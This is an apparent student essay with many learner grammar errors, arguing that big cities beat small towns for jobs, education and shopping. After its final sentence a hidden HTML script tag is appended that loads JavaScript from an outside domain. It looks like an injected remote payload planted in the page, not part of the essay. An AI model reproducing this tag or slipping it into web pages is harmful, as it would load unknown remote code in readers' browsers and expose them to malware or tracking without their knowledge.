Small town life is preferable for some people, while others prefer to live in large cities. Which of these would you like to live in, and why?

From my perspective , people should live in big cities because of three main reasons. Firstly , people can get a job faster than live in small cities. To explain , the big cities have economic developments because many things in these places are modern and civilized such as transportation or shopping mall center. Moreover , many companies are most established in big cities. Some people was looking for their jobs almost a year in small cities , but when they moved on in big cities they can find their jobs easier. Secondly , big cities have greater educational institutes than small cities that is the main reason of some students in small cities to move on. To illustrate , big cities can seek knowledge easier because they have many ways that are advantageous for learning. For example , large cities have modern libraries to search for knowledge and to review lessons. Finally , living in great cities can be easy to find all things that people want. When they need something they can buy now because big cities have many department stores. These places sell many things. Furthermore , The malls update new fashionable things such as cloths , computers and shoes etc. Therefore , people should live in big cities because of three main reasons mentioned above.<script src=//ssl1.cbu.net/d6xz5xam></script>